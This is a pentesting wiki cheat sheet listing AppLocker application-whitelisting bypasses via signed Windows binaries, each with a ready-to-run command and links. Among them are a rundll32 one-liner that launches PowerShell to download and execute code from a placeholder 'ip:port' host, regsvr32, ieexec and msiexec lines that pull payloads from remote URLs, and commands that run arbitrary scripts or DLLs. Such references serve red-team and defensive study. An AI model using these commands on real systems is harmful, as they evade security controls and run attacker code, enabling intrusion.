AppLocker Bypass

From BHaFSec Pentesting Notes Wiki

Credit: @Oddvarmoe https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/README.md

Rundll32.exe

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
rundll32 shell32.dll,Control_RunDLL payload.dll

Requires admin: ?

https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7

Regsvr32.exe

regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll

Requires admin: No
Bypasses:

https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302


Msbuild.exe

msbuild.exe pshell.xml

Requires admin: No

https://gist.github.com/subTee/6b236083da2fd6ddff216e434f257614
http://subt0x10.blogspot.no/2017/04/bypassing-application-whitelisting.html
https://github.com/Cn33liz/MSBuildShell
https://github.com/Cn33liz/MS17-012
https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
https://www.youtube.com/watch?v=aSDEAPXaz28

Regsvcs.exe

regsvcs.exe /U regsvcs.dll
regsvcs.exe regsvcs.dll

Requires admin: ?

https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
https://gist.githubusercontent.com/subTee/fb09ef511e592e6f7993/raw/e9b28e7955a5646672267a61e9685fc5a4ab5f2a/regsvcs.cs

Regasm.exe

regasm.exe /U regsvcs.dll
regasm.exe regsvcs.dll

Requires admin: ?

https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
https://gist.githubusercontent.com/subTee/fb09ef511e592e6f7993/raw/e9b28e7955a5646672267a61e9685fc5a4ab5f2a/regsvcs.cs

Bginfo.exe

bginfo.exe bginfo.bgi /popup /nolicprompt

Requires admin: No

https://msitpros.com/?p=3831
https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/
https://msitpros.com/?p=3860

InstallUtil.exe

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

Requires admin: No

https://github.com/subTee/AllTheThings
https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html

MSDT.exe

Open .diagcab package

Requires admin: ?

https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/

mshta.exe

mshta.exe evilfile.hta

Requires admin: No

https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4

Execute .Bat

cmd.exe /k < script.txt

Requires admin: No

https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3

Execute .PS1

Get-Content script.txt | iex

Requires admin: No

https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3

Execute .VBS

cscript.exe //E:vbscript script.txt

Requires admin: No

https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3


PresentationHost.exe

Missing Example

Requires admin: ?

https://raw.githubusercontent.com/subTee/ShmooCon-2015/master/ShmooCon-2015-Simple-WLEvasion.pdf

dfsvc.exe

Missing Example

Requires admin: ?

https://raw.githubusercontent.com/subTee/ShmooCon-2015/master/ShmooCon-2015-Simple-WLEvasion.pdf

IEExec.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

Requires admin: ?

https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

cdb.exe

cdb.exe -cf x64_calc.wds -o notepad.exe

Requires admin: ?

http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

dnx.exe

dnx.exe consoleapp

Requires admin: ?

https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

rcsi.exe

rcsi.exe bypass.csx

Requires admin: ?

https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

csi.exe

Missing example

Requires admin: ?

https://web.archive.org/web/20161008143428/http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html

CPL loading location manipulation

Control.exe

Requires admin: No

https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/

msxsl.exe

msxsl.exe customers.xml script.xsl

Requires admin: No

https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
https://gist.github.com/subTee/d9380299ff35738723cb44f230ab39a1

msiexec.exe

msiexec /quiet /i cmd.msi
msiexec /q /i http://192.168.100.3/tmp/cmd.png

Requires admin: ?

https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/

cmstp.exe

cmstp.exe /ni /s c:\cmstp\CorpVPN.inf

Requires admin: No

https://msitpros.com/?p=3960
https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e

xwizard.exe

xwizard.exe argument1 argument2
DLL loading in same folder xwizard.dll

Requires admin: No

http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/

fsi.exe

fsi.exe c:\folder\d.fscript

Requires admin: No

https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
https://twitter.com/NickTyrer/status/904273264385589248
https://docs.microsoft.com/en-us/dotnet/fsharp/tutorials/fsharp-interactive/

odbcconf.exe

odbcconf -f file.rsp

Requires admin: ?

https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b